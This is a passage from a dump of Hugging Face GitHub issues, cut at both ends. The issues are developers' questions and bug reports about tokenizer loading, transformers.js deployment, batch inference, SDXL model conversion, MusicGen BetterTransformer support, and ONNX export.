/root/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cached-path-0.6.1/src/cache.rs:564: ETAG fetch failed for https://huggingface.co//data/checkpoint-5600//resolve/main/tokenizer.json, retrying in 4671 milliseconds... \r\n2023-09-12T11:24:10.102170Z ERROR cached_path::cache: /root/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cached-path-0.6.1/src/cache.rs:555: Max retries exceeded for https://huggingface.co//data/checkpoint-5600//resolve/main/tokenizer.json \r\nthread 'main' panicked at 'called `Result::unwrap()` on an `Err` value: \"Model \\\"/data/checkpoint-5600/\\\" on the Hub doesn't have a tokenizer\"', benchmark/src/main.rs:153:78\r\nnote: run with `RUST_BACKTRACE=1` environment variable to display a backtrace\r\nAborted (core dumped)\r\n``` \r\n\r\nI notice `Downloading tokenizer` in error log, and i feel very strange about it beacause `/data/checkpoint-5600/` is my local model path. So i find the src code as following:\r\n\r\nhttps://github.com/huggingface/text-generation-inference/blob/1f69fb9ed4fb91fe0bb9b94edda5729c67e6f02a/benchmark/src/main.rs#L134-L154\r\n\r\nBut i notice that only `tokenizer_config.json` in my local model path but no `tokenizer.json`. And i see that it is the same is as the hub model, for example https://huggingface.co/openlm-research/open_llama_7b_v2/tree/main\r\n\r\nThen i want to bypass by renaming `tokenizer_config.json` to `tokenizer.json` in my local model path, it still doesn't work:\r\n\r\n```\r\n2023-09-12T11:29:52.461487Z INFO text_generation_benchmark: benchmark/src/main.rs:132: Loading tokenizer\r\n2023-09-12T11:29:52.462513Z INFO text_generation_benchmark: benchmark/src/main.rs:138: Found local tokenizer\r\nthread 'main' panicked at 'called `Result::unwrap()` on an `Err` value: Error(\"expected `,` or `}`\", line: 2, column: 18)', benchmark/src/main.rs:139:69\r\nnote: run with `RUST_BACKTRACE=1` environment variable to display a backtrace\r\nAborted (core dumped)\r\n```\r\n\r\nFinally i want to know the `tokenizer_config.json` and `tokenizer.json` expressed here are the same thing?", "url": "https://github.com/huggingface/text-generation-inference/issues/1015", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-09-12T12:10:41Z", "updated_at": "2024-06-07T09:39:32Z", "user": "jessiewiswjc" }, { "repo": "huggingface/autotrain-advanced", "number": 260, "title": "How to create instruction dataset (Q&A) for fine-tuning from PDFs?", "body": "", "url": "https://github.com/huggingface/autotrain-advanced/issues/260", "state": "closed", "labels": [], "created_at": "2023-09-12T02:54:07Z", "updated_at": "2023-12-18T15:31:13Z", "user": "mahimairaja" }, { "repo": "huggingface/transformers.js", "number": 295, "title": "[Question] Issue with deploying model to Vercel using NextJS and tRPC", "body": "Hi I'm trying to deploy my model to Vercel via NextJS and tRPC and have the .cache folder generated using the postinstall script \r\n\r\n```\r\n// @ts-check\r\nlet fs = require(\"fs-extra\");\r\nlet path = require(\"path\");\r\n\r\nasync function copyXenovaToLocalModules() {\r\n const paths = [[\"../../../node_modules/@xenova\", \"../node_modules/@xenova\"]];\r\n\r\n for (const pathTuple of paths) {\r\n const [src, dest] = [\r\n path.join(__dirname, pathTuple[0]),\r\n path.join(__dirname, pathTuple[1]),\r\n ];\r\n await fs.remove(dest).catch(() => {});\r\n await fs.copy(src, dest).catch(() => {});\r\n\r\n // Create .cache folder for dest paths\r\n\r\n const cacheDir = path.join(dest, \"transformers\", \".cache\");\r\n await fs.mkdir(cacheDir).catch(() => {});\r\n }\r\n}\r\n\r\ncopyXenovaToLocalModules();\r\n\r\n```\r\nWhen I run this, I get the following error: \r\n\r\n```\r\nenv {\r\n backends: {\r\n onnx: { wasm: [Object], webgl: {}, logLevelInternal: 'warning' },\r\n tfjs: {}\r\n },\r\n __dirname: '/vercel/path0/packages/api/node_modules/@xenova/transformers',\r\n version: '2.5.4',\r\n allowRemoteModels: true,\r\n remoteHost: 'https://huggingface.co/',\r\n remotePathTemplate: '{model}/resolve/{revision}/',\r\n allowLocalModels: true,\r\n localModelPath: '/vercel/path0/packages/api/node_modules/@xenova/transformers/models/',\r\n useFS: true,\r\n useBrowserCache: false,\r\n useFSCache: true,\r\n cacheDir: '/vercel/path0/packages/api/node_modules/@xenova/transformers/.cache/',\r\n useCustomCache: false,\r\n customCache: null\r\n}\r\nAn error occurred while writing the file to cache: [Error: ENOENT: no such file or directory, mkdir '/vercel'] {\r\n errno: -2,\r\n code: 'ENOENT',\r\n syscall: 'mkdir',\r\n path: '/vercel'\r\n}\r\nAn error occurred while writing the file to cache: [Error: ENOENT: no such file or directory, mkdir '/vercel'] {\r\n errno: -2,\r\n code: 'ENOENT',\r\n syscall: 'mkdir',\r\n path: '/vercel'\r\n}\r\nAn error occurred while writing the file to cache: [Error: ENOENT: no such file or directory, mkdir '/vercel'] {\r\n errno: -2,\r\n code: 'ENOENT',\r\n syscall: 'mkdir',\r\n path: '/vercel'\r\n}\r\n``` \r\nCan someone help me with this? ", "url": "https://github.com/huggingface/transformers.js/issues/295", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-11T11:13:11Z", "updated_at": "2023-09-12T15:23:17Z", "user": "arnabtarwani" }, { "repo": "huggingface/transformers.js", "number": 291, "title": "[Question] Using transformers.js inside an Obsidian Plugin", "body": "I'm trying to run transfomer.js inside of Obsidian but running into some errors:\r\n\"Screenshot\r\n\r\n\r\nThis code is triggering the issues:\r\n```js\r\n\r\nclass MyClassificationPipeline {\r\n\tstatic task = \"text-classification\";\r\n\tstatic model = \"Xenova/distilbert-base-uncased-finetuned-sst-2-english\";\r\n\tstatic instance = null;\r\n\r\n\tstatic async getInstance(progress_callback = null) {\r\n\t\tif (this.instance === null) {\r\n\t\t\t// Dynamically import the Transformers.js library\r\n\t\t\tconsole.log('before import')\r\n\t\t\tlet { pipeline, env } = await import(\"@xenova/transformers\");\r\n\t\t\tconsole.log('after import')\r\n\r\n\t\t\t// NOTE: Uncomment this to change the cache directory\r\n\t\t\t// env.cacheDir = './.cache';\r\n\r\n\t\t\tthis.instance = pipeline(this.task, this.model, {\r\n\t\t\t\tprogress_callback,\r\n\t\t\t});\r\n\t\t}\r\n\r\n\t\treturn this.instance;\r\n\t}\r\n}\r\nexport default MyClassificationPipeline;\r\n\r\n// Comment out this line if you don't want to start loading the model as soon as the server starts.\r\n// If commented out, the model will be loaded when the first request is received (i.e,. lazily).\r\n// MyClassificationPipeline.getInstance();\r\n```\r\n[Link to source](https://github.com/different-ai/obsidian-ml/blob/master/embeddings.js)\r\n\r\n[These are the lines that are calling the code above](https://github.com/different-ai/obsidian-ml/blob/0bd169c6e0c3f385e7238a78c585932fe0320bc9/hello.js#L27-L29)\r\n\r\n\r\n\r\nContext about Obsidian plugins:\r\n- Obsidian plugin is just a single imported js file.\r\n- Most of the time it's bundled using esbuild.\r\n\r\nIn my case, this is [my esbuild setup](https://github.com/different-ai/obsidian-ml/blob/master/esbuild.config.mjs)\r\n\r\n----\r\n\r\nHow should I be tackling this, what would be the recommended way to bundle transformer.js?\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/291", "state": "open", "labels": [ "question" ], "created_at": "2023-09-10T22:12:07Z", "updated_at": "2024-04-30T13:52:06Z", "user": "benjaminshafii" }, { "repo": "huggingface/candle", "number": 807, "title": "How to use the kv_cache?", "body": "Hi, how would I use the kv_cache? Let's say I want a chat like type of thing, how would I save the kv_cache and load it so that all the tokens won't have to be computed again?", "url": "https://github.com/huggingface/candle/issues/807", "state": "closed", "labels": [], "created_at": "2023-09-10T21:39:31Z", "updated_at": "2025-11-22T23:18:58Z", "user": "soupslurpr" }, { "repo": "huggingface/transformers", "number": 26061, "title": "How to perform batch inference? ", "body": "### Feature request\n\nI want to pass a list of tests to model.generate. \r\n\r\ntext = \"hey there\"\r\ninputs = tokenizer(text, return_tensors=\"pt\").to(0)\r\n\r\nout = model.generate(**inputs, max_new_tokens=184)\r\nprint(tokenizer.decode(out[0], skip_special_tokens=True))\r\n\r\n\r\n\n\n### Motivation\n\nI want to do batch inference. \n\n### Your contribution\n\nTesting", "url": "https://github.com/huggingface/transformers/issues/26061", "state": "closed", "labels": [], "created_at": "2023-09-08T20:59:37Z", "updated_at": "2023-10-23T16:04:20Z", "user": "ryanshrott" }, { "repo": "huggingface/text-generation-inference", "number": 998, "title": "How to insert a custom stop symbol, like
?", "body": "### Feature request\n\nnothing\n\n### Motivation\n\nnothing\n\n### Your contribution\n\nnothing", "url": "https://github.com/huggingface/text-generation-inference/issues/998", "state": "closed", "labels": [], "created_at": "2023-09-08T07:06:08Z", "updated_at": "2023-09-08T07:13:38Z", "user": "babytdream" }, { "repo": "huggingface/safetensors", "number": 355, "title": "Safe tensors cannot be easily freed!", "body": "### System Info\n\nHi, \r\n\r\nI am using the safetensors for loading Falcon-180B model. I am loading the ckpts one by one on CPU, and then try to remove the tensors by simply calling `del` function. However, I am seeing that CPU memory keeps increasing until it runs out of memory and system crashes (I am also calling `gc.collect()` after deleting tensors). Is there any good way to release the safetensor memory.\r\nThanks,\r\nReza\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Reproduction\n\n```\r\nfrom safetensors.torch import load_file\r\nsd_ = load_file(ckpt_path)\r\nlens = len(sd_.keys())\r\nfor _ in range(lens):\r\n data = sd_.popitem()\r\n del data\r\ndel sd_\r\ngc.collect()\r\n```\n\n### Expected behavior\n\nrelease the memory after calling `gc.collect()`", "url": "https://github.com/huggingface/safetensors/issues/355", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-09-07T22:13:15Z", "updated_at": "2024-08-30T10:22:01Z", "comments": 4, "user": "RezaYazdaniAminabadi" }, { "repo": "huggingface/transformers.js", "number": 285, "title": "The generate API always returns the same number of tokens as output nomatter what is min_tokens", "body": "Here is the code I am trying\r\n```js\r\nimport { pipeline } from '@xenova/transformers';\r\nimport { env } from '@xenova/transformers';\r\n\r\n\r\nlet generator = await pipeline('text2text-generation', 'Xenova/LaMini-Flan-T5-783M');\r\nlet output = await generator('write a blog on Kubernetes?', {\r\n max_new_tokens: 512,min_new_tokens:512,min_length:300\r\n});\r\n\r\nconsole.log(output)\r\n```\r\nSo no matter whatever is min_new_tokens or min_length (even if I try one of them only), output just remains same length", "url": "https://github.com/huggingface/transformers.js/issues/285", "state": "closed", "labels": [ "bug" ], "created_at": "2023-09-07T13:30:39Z", "updated_at": "2023-09-17T21:57:14Z", "user": "allthingssecurity" }, { "repo": "huggingface/chat-ui", "number": 430, "title": "Server does not support event stream content error for custom endpoints", "body": "is there anyone faced the issue such as \"Server does not support event stream content\" when parsing the custom endpoint results.\r\nwhat is the solution for this error?\r\n\r\nIn order to reproduce the issue,\r\nUser enter prompts saying \"how are you\" -> call goes to custom endpoint -> Endpoint returns response as string -> error popsup \"Server does not support event stream content\"", "url": "https://github.com/huggingface/chat-ui/issues/430", "state": "closed", "labels": [], "created_at": "2023-09-07T10:01:18Z", "updated_at": "2023-09-15T00:01:56Z", "comments": 3, "user": "nandhaece07" }, { "repo": "huggingface/sentence-transformers", "number": 2300, "title": "How to convert embedding vector to text \uff1f", "body": "I use the script below to convert text to embeddings \r\n```\r\nmodel = SentenceTransformer('all-MiniLM-L6-v2')\r\nembeddings = model.encode(text)\r\n```\r\n\r\nBut how to convert embeddings to text \uff1f", "url": "https://github.com/huggingface/sentence-transformers/issues/2300", "state": "closed", "labels": [], "created_at": "2023-09-07T09:19:22Z", "updated_at": "2025-09-01T11:44:34Z", "user": "chengzhen123" }, { "repo": "huggingface/transformers.js", "number": 283, "title": "[Question] Model type for tt/ee not found, assuming encoder-only architecture", "body": "Reporting this as requested by the warning message, but as a question because I'm not entirely sure if it's a bug:\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/1167575/f40d5935-01b4-442e-802b-ed5fd7a774b7)\r\n\r\nHere's the code I ran:\r\n\r\n```js\r\nlet quantized = false; // change to `true` for a much smaller model (e.g. 87mb vs 345mb for image model), but lower accuracy\r\nlet { AutoProcessor, CLIPVisionModelWithProjection, RawImage, AutoTokenizer, CLIPTextModelWithProjection } = await import('https://cdn.jsdelivr.net/npm/@xenova/transformers@2.5.4/dist/transformers.min.js');\r\nlet imageProcessor = await AutoProcessor.from_pretrained('Xenova/clip-vit-base-patch16');\r\nlet visionModel = await CLIPVisionModelWithProjection.from_pretrained('Xenova/clip-vit-base-patch16', {quantized});\r\nlet tokenizer = await AutoTokenizer.from_pretrained('Xenova/clip-vit-base-patch16');\r\nlet textModel = await CLIPTextModelWithProjection.from_pretrained('Xenova/clip-vit-base-patch16', {quantized});\r\n\r\nfunction cosineSimilarity(A, B) {\r\n if(A.length !== B.length) throw new Error(\"A.length !== B.length\");\r\n let dotProduct = 0, mA = 0, mB = 0;\r\n for(let i = 0; i < A.length; i++){\r\n dotProduct += A[i] * B[i];\r\n mA += A[i] * A[i];\r\n mB += B[i] * B[i];\r\n }\r\n mA = Math.sqrt(mA);\r\n mB = Math.sqrt(mB);\r\n let similarity = dotProduct / (mA * mB);\r\n return similarity;\r\n}\r\n\r\n// get image embedding:\r\nlet image = await RawImage.read('https://i.imgur.com/RKsLoNB.png');\r\nlet imageInputs = await imageProcessor(image);\r\nlet { image_embeds } = await visionModel(imageInputs);\r\nconsole.log(image_embeds.data);\r\n\r\n// get text embedding:\r\nlet texts = ['a photo of an astronaut'];\r\nlet textInputs = tokenizer(texts, { padding: true, truncation: true });\r\nlet { text_embeds } = await textModel(textInputs);\r\nconsole.log(text_embeds.data);\r\n\r\nlet similarity = cosineSimilarity(image_embeds.data, text_embeds.data);\r\nconsole.log(similarity);\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/283", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-07T05:01:34Z", "updated_at": "2023-09-08T13:17:07Z", "user": "josephrocca" }, { "repo": "huggingface/safetensors", "number": 354, "title": "Is it possible to append to tensors along a primary axis?", "body": "### Feature request\n\nit would be really cool to be able to append to a safetensor file so you can continue to add data along, say, a batch dimension\n\n### Motivation\n\nfor logging data during train runs that can be visualized from an external tool. something like a live application that lazily loads the saved data. this is super useful for reinforcement learning\n\n### Your contribution\n\ni could submit a PR if necessary.", "url": "https://github.com/huggingface/safetensors/issues/354", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-09-06T17:54:56Z", "updated_at": "2023-12-11T01:48:44Z", "comments": 2, "user": "verbiiyo" }, { "repo": "huggingface/huggingface_hub", "number": 1643, "title": "We couldn't connect to 'https://huggingface.co/' to load this model and it looks like distilbert-base-uncased is not the path to a directory conaining a config.json file. Checkout your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.", "body": "### System Info\r\n\r\nHello, I have been using hugging face transformers with a lot of success. I have been able to create many successful fine-tuned pre-trained text classification models using various HF transformers and have been using HF integration with SageMaker in a SageMaker conda_pytorch_310 notebook. \r\n\r\n\r\nmy code looks like this: \r\n```!pip install \"transformers==4.17.0\" \"datasets[s3]==1.18.4\" --upgrade```\r\n``` tokenizer = AutoTokenizer.from_pretrained(tokenizer_name)```\r\n\r\n\r\nYesterday I was able to successfully download, fine tune and make inferences using distilbert-base-uncased, and today I am getting: ```OSError: We couldn't connect to 'https://huggingface.co/' to load this model and it looks like mattmdjaga/segformer_b2_clothes is not the path to a directory conaining a config.json file.\r\nCheckout your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.```\r\n\r\nLooking through the traceback I see: ```HTTPError: 429 Client Error: Too Many Requests for url: https://huggingface.co/mattmdjaga/segformer_b2_clothes/resolve/main/config.json\r\nDuring handling of the above exception, another exception occurred:```\r\n....\r\n ```File ~/anaconda3/envs/pytorch_p310/lib/python3.10/site-packages/transformers/file_utils.py:2052, in _raise_for_status(request) 2050 raise RevisionNotFoundError((f\"404 Client Error: Revision Not Found for url: {request.url}\"))-> 2052 request.raise_for_status()```\r\n\r\nI have tried many different models, both text classification and non-text classification and getting the same error. This worked yesterday and nothing has changed since then. I also have confirmed that nothing has changed on our end to cause this error ,and confirmed all the model names.\r\n\r\nAny insights would be appreciated!\r\n\r\n@Wauplin \r\n\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(tokenizer_name)\r\n\r\n\r\n### Expected behavior\r\n\r\nmodel successfully downloads", "url": "https://github.com/huggingface/huggingface_hub/issues/1643", "state": "closed", "labels": [], "created_at": "2023-09-06T17:18:45Z", "updated_at": "2023-09-07T15:51:12Z", "user": "a-rhodes-vcu" }, { "repo": "huggingface/setfit", "number": 417, "title": "Passing multiple evaluation metrics to SetFitTrainer", "body": "Hi there, after reading the docs I find that one can easily get the f1 score or accuracy by passing the respective string as the `metric` argument to the trainer. However, how can I get both or even other metrics, such as f1_per_class?\r\n\r\nThanks :)", "url": "https://github.com/huggingface/setfit/issues/417", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-06T11:38:08Z", "updated_at": "2023-11-24T13:31:08Z", "user": "fhamborg" }, { "repo": "huggingface/optimum", "number": 1357, "title": "[RFC] MusicGen `.to_bettertransformer()` integration", "body": "### Feature request\n\nAdd support for MusicGen Better Transformer integration. MusicGen is composed of three sub-models:\r\n\r\n1. Text encoder: maps the text inputs to a sequence of hidden-state representations. The pre-trained MusicGen models use a frozen text encoder from either T5 or Flan-T5\r\n2. MusicGen decoder: a language model (LM) that auto-regressively generates audio tokens (or codes) conditional on the encoder hidden-state representations. The pre-trained MusicGen models use the BART decoder structure\r\n3. Audio codec: used to encode an audio prompt to use as prompt tokens, and recover the audio waveform from the audio tokens predicted by the decoder. The pre-trained MusicGen models use the [EnCodec model](https://huggingface.co/docs/transformers/main/model_doc/encodec)\r\n\r\n=> the text encoder uses the T5 attention module, and the MusicGen decoder uses the BART attention module. Thus, there are no extra attention layers we need to add to optimum. The audio codec is not transformer based, so we don't need to export it to better transformer.\r\n\r\nThe question is simply how to get the integration working with the sub-model structure. The config file for MusicGen is nested in the same way as the model structure, containing sub-configs for each of the three components: https://huggingface.co/docs/transformers/main/model_doc/musicgen#transformers.MusicgenConfig \r\n\r\n=> this means that the text encoder config is accessed as `config.text_encoder`, and the text encoder model as `model.text_encoder`. Likewise, the MusicGen decoder config is accessed as `config.decoder`, and the text encoder model as `model.decoder`. We need to export the pairs of {models, configs} to their better transformer counterparts, e.g. {`model.text_encoder`, `config.text_encoder`} -> `better_transformer_text_encoder`, and {`model.decoder`, `config.decoder`} -> `better_transformer_decoder`.\r\n\r\nIdeally, we'd like to be able to export the entire model to better transformer in one go:\r\n```python\r\nfrom transformers import MusicgenForConditionalGeneration\r\n\r\nmodel = MusicgenForConditionalGeneration.from_pretrained(\"facebook/musicgen-small\")\r\nmodel = model.to_bettertransformer()\r\n```\r\n\r\nHowever. we can't simply export {`model`, `config`} like this, since the top-level config does not contain the config attributes for the sub-models. It's just a place-holder for the sub-model configs.\r\n\r\nA simple workaround is to export the text encoder and decoder separately:\r\n```python\r\nfrom transformers import MusicgenForConditionalGeneration\r\n\r\nmodel = MusicgenForConditionalGeneration.from_pretrained(\"facebook/musicgen-small\")\r\nmodel.text_encoder = model.text_encoder.to_bettertransformer()\r\nmodel.decoder = model.decoder.to_bettertransformer()\r\n```\r\n=> but this diverges from the better transformer API\r\n\n\n### Motivation\n\n~9M MusicGen [downloads](https://huggingface.co/models?search=facebook/musicgen) per month -> huge interest in running the model!\n\n### Your contribution\n\nHappy to help with the integration!", "url": "https://github.com/huggingface/optimum/issues/1357", "state": "closed", "labels": [], "created_at": "2023-09-06T10:25:50Z", "updated_at": "2024-01-10T17:31:44Z", "comments": 1, "user": "sanchit-gandhi" }, { "repo": "huggingface/diffusers", "number": 4906, "title": "How to check whether the image is flagged as inappropriate automated?", "body": "Is there a way to know whether the generated image (without seeing it) was flagged as inappropriate?", "url": "https://github.com/huggingface/diffusers/issues/4906", "state": "closed", "labels": [], "created_at": "2023-09-05T17:51:07Z", "updated_at": "2023-09-07T05:49:46Z", "user": "sarmientoj24" }, { "repo": "huggingface/diffusers", "number": 4905, "title": "How to convert pretrained SDXL .safetensors model to diffusers folder format", "body": "As SDXL is gaining adoption, more and more community based models pop up that that are just saved as a .safetensors file. E.g the popular Realistic Vision: https://civitai.com/models/139562?modelVersionId=154590\r\n\r\nWhen running train_dreambooth_lora_sdxl.py, the training script expects the diffusers folder format to accelerate text encoder, unet etc. As far as I know, there is no possible way to use `StableDiffusionXLPipeline.from_single_file()` to do the same.\r\n\r\nIs there a way to convert a SDXL 1.0 fine-tuned .safetensors file to the diffusers folder format?\r\n\r\nI found this but it doesn't seem to be applicable to SDXL scripts/convert_lora_safetensor_to_diffusers.py.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4905", "state": "closed", "labels": [], "created_at": "2023-09-05T17:01:27Z", "updated_at": "2023-09-06T09:55:54Z", "user": "agcty" }, { "repo": "huggingface/transformers.js", "number": 280, "title": "[Question] How to run multiple pipeline or multiple modal?", "body": "\r\nI am trying to transcribe from audio source and need to do multi language translation. I had tried transcribing using Xenova/whisper- and and take text input and feed in to \"Xenova/m2m100_418M\" modal but due to multiple pipeline it's failed. Is there any way to achieve\r\nthis? ", "url": "https://github.com/huggingface/transformers.js/issues/280", "state": "closed", "labels": [ "question" ], "created_at": "2023-09-05T11:33:44Z", "updated_at": "2023-11-01T11:32:15Z", "user": "sundarshahi" }, { "repo": "huggingface/optimum", "number": 1346, "title": "BetterTransfomer Support for the GPTBigCode model", "body": "### Feature request\n\n\r\n\r\nis it possible to support GPTBigCode with BetterTransformer?\r\n\r\nhttps://huggingface.co/docs/transformers/model_doc/gpt_bigcode\r\n\r\n\n\n### Motivation\n\n\r\nA very popular Decoder model for Code.\n\n### Your contribution\n\n\r\nhope you can achieve it. Thanks.", "url": "https://github.com/huggingface/optimum/issues/1346", "state": "closed", "labels": [], "created_at": "2023-09-04T16:52:56Z", "updated_at": "2023-09-08T14:51:17Z", "comments": 5, "user": "amarazad" }, { "repo": "huggingface/chat-ui", "number": 426, "title": "`stream` is not supported for this model", "body": "Hello Eperts,\r\nTrying to run https://github.com/huggingface/chat-ui by providing models like EleutherAI/pythia-1b, gpt2-large. With all these models, there is this consitent error\r\n{\"error\":[\"Error in `stream`: `stream` is not supported for this model\"]}\r\nAlthough I can see that hosted inference API for these models are working well from their hugging face pages like this: https://huggingface.co/gpt2-large\r\nCould someone please help?", "url": "https://github.com/huggingface/chat-ui/issues/426", "state": "open", "labels": [ "question", "models" ], "created_at": "2023-09-02T05:30:47Z", "updated_at": "2023-12-24T16:39:21Z", "user": "newUserForTesting" }, { "repo": "huggingface/diffusers", "number": 4871, "title": "How to run \"StableDiffusionXLPipeline.from_single_file\"?", "body": "I got an error when I ran the following code and it got an error on the line \"pipe = StableDiffusionXLPipeline.\" and how to solve it?\r\n\r\nnotes:\r\nI don't have a model refiner, I just want to run a model with a DIffuser XL\r\n\r\n```\r\nfrom diffusers import StableDiffusionXLPipeline, StableDiffusionXLImg2ImgPipeline\r\nimport torch\r\n\r\npipe = StableDiffusionXLPipeline.from_single_file(\r\n \"/content/model/model.safetensors\", torch_dtype=torch.float16).to(\"cuda\")\r\n\r\nimage = pipe(\r\n prompt,\r\n negative_prompt=negative_prompt,\r\n width=Width,\r\n height=Height,\r\n guidance_scale=7,\r\n target_size=(1024,1024),\r\n original_size=(4096,4096),\r\n num_inference_steps=25\r\n ).images[0]\r\n```\r\n\r\n```\r\n/usr/local/lib/python3.10/dist-packages/transformers/models/clip/feature_extraction_clip.py:28: FutureWarning: The class CLIPFeatureExtractor is deprecated and will be removed in version 5 of Transformers. Please use CLIPImageProcessor instead.\r\n warnings.warn(\r\n---------------------------------------------------------------------------\r\nTypeError Traceback (most recent call last)\r\n[](https://localhost:8080/#) in ()\r\n 2 import torch\r\n 3 \r\n----> 4 pipe = StableDiffusionXLPipeline.from_single_file(\r\n 5 \"/content/model/model.safetensors\", torch_dtype=torch.float16).to(\"cuda\")\r\n 6 \r\n\r\n1 frames\r\n[/usr/local/lib/python3.10/dist-packages/diffusers/pipelines/stable_diffusion/convert_from_ckpt.py](https://localhost:8080/#) in download_from_original_stable_diffusion_ckpt(checkpoint_path, original_config_file, image_size, prediction_type, model_type, extract_ema, scheduler_type, num_in_channels, upcast_attention, device, from_safetensors, stable_unclip, stable_unclip_prior, clip_stats_path, controlnet, load_safety_checker, pipeline_class, local_files_only, vae_path, vae, text_encoder, tokenizer, config_files)\r\n 1564 )\r\n 1565 else:\r\n-> 1566 pipe = pipeline_class(\r\n 1567 vae=vae,\r\n 1568 text_encoder=text_model,\r\n\r\nTypeError: StableDiffusionXLPipeline.__init__() got an unexpected keyword argument 'safety_checker'\r\n```\r\n", "url": "https://github.com/huggingface/diffusers/issues/4871", "state": "closed", "labels": [], "created_at": "2023-09-01T22:42:25Z", "updated_at": "2023-09-09T03:35:53Z", "user": "Damarcreative" }, { "repo": "huggingface/optimum", "number": 1334, "title": "Enable CLI export of decoder-only models without present outputs", "body": "### Feature request\r\n\r\nCurrently `optimum-cli export onnx` only supports exporting text-generation models with present outputs (`--task text-generation`) or with past+present outputs (``--task text-generation-with-past`). It would be useful to be able to export a variant without any caching structures if they will not be used.\r\n\r\nExample of how `--task text-generation` is not sufficient for this usecase:\r\n
\r\n\r\n```\r\noptimum-cli export onnx --model facebook/opt-125m --task text-generation TEST\r\n...\r\nValidating ONNX model TEST/decoder_model.onnx...\r\n -[\u2713] ONNX model output names match reference model (present.7.key, present.2.key, present.3.key, present.2.value, present.3.value, present.10.value, logits, present.8.key, present.0.value, present.10.key, present.1.key, present.1.value, present.11.key, present.9.value, present.6.value, present.4.value, present.7.value, present.5.value, present.5.key, present.8.value, present.9.key, present.4.key, present.6.key, present.0.key, present.11.value)\r\n - Validating ONNX Model output \"logits\":\r\n -[\u2713] (2, 16, 50272) matches (2, 16, 50272)\r\n -[x] values not close enough, max diff: 3.719329833984375e-05 (atol: 1e-05)\r\n - Validating ONNX Model output \"present.0.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.0.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.1.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.1.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.2.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.2.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.3.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.3.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.4.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[x] values not close enough, max diff: 1.8358230590820312e-05 (atol: 1e-05)\r\n - Validating ONNX Model output \"present.4.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.5.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.5.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.6.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.6.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.7.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.7.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.8.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.8.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.9.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.9.value\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.10.key\":\r\n -[\u2713] (2, 12, 16, 64) matches (2, 12, 16, 64)\r\n -[\u2713] all values close (atol: 1e-05)\r\n - Validating ONNX Model output \"present.10.value\":\r\n -[\u2713] (2, 12, 16, 64) matches ", "url": 